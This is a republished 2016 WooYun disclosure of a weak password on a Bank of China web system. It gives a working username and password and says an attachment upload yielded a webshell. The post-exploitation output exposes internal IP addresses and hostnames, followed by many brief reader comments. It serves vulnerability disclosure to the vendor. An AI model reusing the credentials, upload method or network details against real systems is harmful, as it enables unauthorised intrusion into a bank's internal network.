中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网)

admin
admin
admin
140559
文章
117
评论
2017年5月2日21:04:54评论531 views字数 237阅读0分47秒阅读模式
摘要

2016-05-01: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

漏洞概要 关注数(136) 关注此漏洞

缺陷编号: WooYun-2016-204059

漏洞标题: 中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网)

相关厂商: 中国银行

漏洞作者: 猪猪侠中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网)

提交时间: 2016-05-01 14:44

公开时间: 2016-06-18 21:00

漏洞类型: 未授权访问/权限绕过

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 安全意识不足 后台被猜解 安全意识不足

19人收藏

漏洞详情

披露状态:

2016-05-01: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

简要描述:

中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网)

详细说明:

#1 发现方法

利用通用的弱口令检测脚本,简单而又高效且杀伤力巨大

http://zone.wooyun.org/content/22529

http://zone.wooyun.org/content/21962

中国姓名排行TOP500(数据统计来自国家人口数据库)

http://zone.wooyun.org/content/18372

#2 漏洞描述

https://e.boc.cn/ehome/property/frame/sign.do

发现1个弱口令:wangwei:000000

社区管理功能,添加附件,即可获得shell

中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网)

漏洞证明:

https://e.boc.cn/ehome/eshop/ehome-files/eproperty/2016/05/01/Customize14*********.jsp

中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网)

code 区域 
[/]$ /sbin/ifconfig -a
 eth0      Link encap:Ethernet  HWaddr 00:50:56:9A:72:2C  
           inet addr:21.123.47.151  Bcast:21.123.47.255  Mask:255.255.255.0
           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
           RX packets:127879201 errors:0 dropped:0 overruns:0 frame:0
           TX packets:117334178 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:22666975632 (21.1 GiB)  TX bytes:32615347620 (30.3 GiB)
 
 eth1      Link encap:Ethernet  HWaddr 00:50:56:9A:14:C4  
           inet addr:10.123.47.151  Bcast:10.123.47.255  Mask:255.255.255.0
           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
           RX packets:51273711 errors:0 dropped:0 overruns:0 frame:0
           TX packets:46856648 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:12233542012 (11.3 GiB)  TX bytes:9912431273 (9.2 GiB)
 
 lo        Link encap:Local Loopback  
           inet addr:127.0.0.1  Mask:255.0.0.0
           UP LOOPBACK RUNNING  MTU:65536  Metric:1
           RX packets:238664440 errors:0 dropped:0 overruns:0 frame:0
           TX packets:238664440 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:0 
           RX bytes:24040429146 (22.3 GiB)  TX bytes:24040429146 (22.3 GiB)
 
 
 
 [/]$ cat /etc/hosts
 127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4
 ::1         localhost localhost.localdomain localhost6 localhost6.localdomain6
 21.123.47.146 P1EZECAP01
 21.123.47.147 P1EZECAP02
 21.123.47.148 P1EZECAP03
 21.123.47.149 P1EZECAP04
 21.123.47.150 P1EZECAP05
 21.123.47.151 P1EZECAP06
 21.123.47.152 P1EZECAP07
 21.123.47.153 P1EZECAP08
 10.123.47.146 P1EZECAP01_gpfs
 10.123.47.147 P1EZECAP02_gpfs
 10.123.47.148 P1EZECAP03_gpfs
 10.123.47.149 P1EZECAP04_gpfs
 10.123.47.150 P1EZECAP05_gpfs
 10.123.47.151 P1EZECAP06_gpfs
 10.123.47.152 P1EZECAP07_gpfs
 10.123.47.153 P1EZECAP08_gpfs
 21.122.32.116 ZabbixServer
 21.123.102.88 nbu3media1
 21.123.102.89 nbu3media2
 21.123.102.90 nbu3master
 
 
 [/]$ /sbin/arp -a
 ? (21.123.47.161) at 00:50:56:9a:3d:95 [ether] on eth0
 P1EZECAP05 (21.123.47.150) at 00:50:56:9a:00:55 [ether] on eth0
 ? (21.123.47.1) at 00:00:0c:9f:f0:2f [ether] on eth0
 P1EZECAP01_gpfs (10.123.47.146) at 00:50:56:9a:62:66 [ether] on eth1
 P1EZECAP05_gpfs (10.123.47.150) at 00:50:56:9a:79:c7 [ether] on eth1
 P1EZECAP03_gpfs (10.123.47.148) at 00:50:56:9a:31:0c [ether] on eth1
 P1EZECAP04_gpfs (10.123.47.149) at 00:50:56:9a:6f:8f [ether] on eth1
 P1EZECAP07 (21.123.47.152) at 00:50:56:9a:49:62 [ether] on eth0
 P1EZECAP08_gpfs (10.123.47.153) at 00:50:56:9a:7b:08 [ether] on eth1
 P1EZECAP07_gpfs (10.123.47.152) at 00:50:56:9a:05:f1 [ether] on eth1
 P1EZECAP02_gpfs (10.123.47.147) at 00:50:56:9a:56:89 [ether] on eth1
 
 
 [/]$

修复方案:

补弱口令,补上传漏洞

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-04 20:50

厂商回复:

感谢白帽子

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-05-01 14:48 | Hero ( 普通白帽子 | Rank:162 漏洞数:53 | 药药切克闹,充气娃娃迷幻药)

    0

    1

  2. 2016-05-01 14:58 | 番茄炒蛋 ( 普通白帽子 | Rank:187 漏洞数:50 | 这条路还很长,还需要更努力)

    0

    2

  3. 2016-05-01 14:58 | 隔壁老三 ( 普通白帽子 | Rank:103 漏洞数:29 | ฐ้้้้้้้้้ฐ้้้้้้้้้...)

    0

    3

  4. 2016-05-01 15:00 | adminss ( 路人 | Rank:24 漏洞数:19 | ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇...)

    0

    4

  5. 2016-05-01 15:01 | loopx9 中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网) ( 普通白帽子 | Rank:827 漏洞数:84 | ..)

    0

    5

  6. 2016-05-01 15:06 | 啊L川 中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网) ( 普通白帽子 | Rank:195 漏洞数:39 | 菜鸟 ,菜渣, 菜呀!)

    0

    6

  7. 2016-05-01 15:09 | hecate ( 普通白帽子 | Rank:823 漏洞数:129 | ®高级安全工程师 | WooYun认证√)

    0

    66666

  8. 2016-05-01 15:14 | 0h1in9e ( 实习白帽子 | Rank:68 漏洞数:23 | 林歌 | 峨眉山下修炼中的<网络安全></web开...)

    0

    9

  9. 2016-05-01 15:26 | 小龙 ( 普通白帽子 | Rank:2794 漏洞数:546 | 我就问,还有谁!!!!!!!!!!!!!...)

    0

    123124

  10. 2016-05-01 15:32 | 大菜鸟 ( 路人 | Rank:2 漏洞数:1 | 呵呵呵呵呵呵)

    0

    劳动节都在劳动,真是业界大牛

  11. 2016-05-01 16:23 | 坠落。 ( 实习白帽子 | Rank:41 漏洞数:4 )

    0

    .....

  12. 2016-05-01 16:40 | 万年死宅 ( 实习白帽子 | Rank:97 漏洞数:44 | 天王盖地虎,宝塔镇河妖!)

    0

    66666666666666666666666+

  13. 2016-05-01 16:48 | Discover ( 实习白帽子 | Rank:37 漏洞数:15 )

    0

    6666666666666

  14. 2016-05-01 22:20 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号:233sec 不定期分享各种漏洞思...)

    0

    666666

  15. 2016-05-01 23:03 | 习总夸我好青年 ( 路人 | Rank:2 漏洞数:1 | 刚来的,请多关照)

    0

    6666666666666

  16. 2016-05-02 07:45 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    1

    666666666666

  17. 2016-05-02 20:41 | ds-hale ( 路人 | Rank:4 漏洞数:2 | free loop)

    0

    66666666666

  18. 2016-05-03 09:22 | 开心一下1313 ( 实习白帽子 | Rank:77 漏洞数:27 | 喝口水,压压惊......)

    0

    6666666666666666666777777777777

  19. 2016-05-03 10:09 | 北洋贱队 ( 普通白帽子 | Rank:252 漏洞数:25 )

    0

    666

  20. 2016-05-03 19:16 | Any3ite ( 路人 | Rank:26 漏洞数:12 | 土耳其web 国内的我就看看不说话)

    0

    队形都乱了、

  21. 2016-05-04 22:01 | 白骨夫人 ( 普通白帽子 | Rank:248 漏洞数:56 | 白骨夫人,白只做白的,骨就是骨气,夫人就...)

    0

    猪哥牛逼啊

  22. 2016-05-05 17:16 | Orvilla ( 路人 | Rank:4 漏洞数:1 | 菜逼来学习)

    0

    银行弱口令,,真是..

  23. 2016-05-26 10:57 | Dusk ( 实习白帽子 | Rank:35 漏洞数:20 )

    0

    6666666666666

  24. 2016-05-26 21:11 | 习总夸我好青年 ( 路人 | Rank:2 漏洞数:1 | 刚来的,请多关照)

    0

    6666666666666666666

  25. 2016-06-18 21:55 | 班尼路 ( 普通白帽子 | Rank:397 漏洞数:110 | 信息安全爱好者)

    0

    运维可以开除了

  26. 2016-06-19 16:57 | 1993* ( 实习白帽子 | Rank:34 漏洞数:10 | hacked by 菜菜(H))

    0

    大侠收了我吧!!!

  27. 2016-06-20 14:53 | Any3ite ( 路人 | Rank:26 漏洞数:12 | 土耳其web 国内的我就看看不说话)

    0

    66666666666

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin